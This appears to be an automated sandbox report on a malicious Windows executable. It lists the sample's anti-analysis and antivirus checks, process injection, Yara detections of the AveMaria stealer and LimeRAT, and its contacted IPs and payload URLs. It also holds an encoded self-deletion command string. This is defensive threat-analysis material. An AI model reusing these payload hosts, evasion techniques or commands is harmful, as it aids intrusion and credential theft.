Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Thread delayed: delay time: 922337203685477
Source: wtqsCpda..exe, 0000000F.00000002.80316092456.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Windows\vboxhook.dll
Source: chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: vmware
Source: chrome.exe Binary or memory string: \vboxhook.dll
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684948349.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83501450597.0000000001151000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502605752.00000000011ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wtqsCpda..exe, 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, wtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: \vboxhook.dllQY21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD71A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 1_2_00BD71A3
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDA22B FindFirstFileExW, 1_2_00BDA22B
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD7B8E mov eax, dword ptr fs:[00000030h] 1_2_00BD7B8E
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD9DF6 mov eax, dword ptr fs:[00000030h] 1_2_00BD9DF6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02E6001A mov eax, dword ptr fs:[00000030h] 12_2_02E6001A
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BD4959
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD71A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C 1_2_00BD71A3
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDB2B8 GetProcessHeap, 1_2_00BDB2B8
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B9A698 LdrInitializeThunk, 18_2_02B9A698
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BD4959
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4AEF SetUnhandledExceptionFilter, 1_2_00BD4AEF
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD72E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00BD72E0
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD42DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00BD42DA

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: Chrome[1].exe.1.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: wtqsCpda..exe.1.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: chrome.exe.15.dr, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: IconLib.dll.18.dr, System.Drawing.IconLib/Win32.cs Reference to suspicious API methods: ('FindResource', 'FindResource@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll'), ('LoadLibraryEx', 'LoadLibraryEx@kernel32.dll')
Source: 18.2.chrome.exe.760000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 18.0.chrome.exe.760000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.2.chrome.exe.a20000.0.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.1.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.2.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Source: 19.0.chrome.exe.a20000.3.unpack, ??????????????/???????.cs Reference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Process created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager+
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager-
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager1
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager5
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Users\user\AppData\Roaming\wtqsCpda..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4775 cpuid 1_2_00BD4775
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD4BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00BD4BDE

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Yara detected LimeRAT
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
AV process strings found (often used to terminate AV products)
Source: chrome.exe, 00000012.00000003.80689278406.00000000069AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.82973891926.00000000069AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83520044548.00000000069B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: chrome.exe, 00000012.00000002.83507733263.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83505966850.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83511079923.0000000003178000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DocumentoSENAMHI20222103.exe PID: 6576, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 593268 Sample: DocumentoSENAMHI20222103.exe Startdate: 21/03/2022 Architecture: WINDOWS Score: 100 42 pastebin.com 2->42 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 15 other signatures 2->62 9 DocumentoSENAMHI20222103.exe 2->9         started        13 chrome.exe 2->13         started        signatures3 process4 dnsIp5 44 172.111.242.20, 2031, 2033, 49761 M247GB United States 9->44 32 C:\Users\user\AppData\Roaming\wtqsCpda..exe, PE32 9->32 dropped 34 C:\Users\user\AppData\Local\...\Chrome[1].exe, PE32 9->34 dropped 36 C:\Users\user\AppData\...\vcruntime140.dll, PE32 9->36 dropped 40 5 other files (none is malicious) 9->40 dropped 16 wtqsCpda..exe 9->16         started        20 cmd.exe 9->20         started        46 pastebin.com 104.23.98.190, 443, 49764 CLOUDFLARENETUS United States 13->46 38 C:\Users\user\AppData\Local\...\IconLib.dll, PE32 13->38 dropped 64 Antivirus detection for dropped file 13->64 66 Multi AV Scanner detection for dropped file 13->66 68 Protects its processes via BreakOnTermination flag 13->68 70 2 other signatures 13->70 file6 signatures7 process8 file9 30 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 16->30 dropped 48 Antivirus detection for dropped file 16->48 50 Multi AV Scanner detection for dropped file 16->50 52 Machine Learning detection for dropped file 16->52 54 3 other signatures 16->54 22 schtasks.exe 16->22         started        24 chrome.exe 16->24         started        26 conhost.exe 20->26         started        signatures10 process11 process12 28 conhost.exe 22->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.111.242.20
 unknown United States
9009 M247GB true
104.23.98.190
 pastebin.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
pastebin.com 104.23.98.190 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://pastebin.com/raw/03PEm7js false
    		high
    172.111.242.20 true
    • Avira URL Cloud: malware
    		 unknown
    http://172.111.242.20/Chrome.exe true
    • Avira URL Cloud: malware
    		 unknown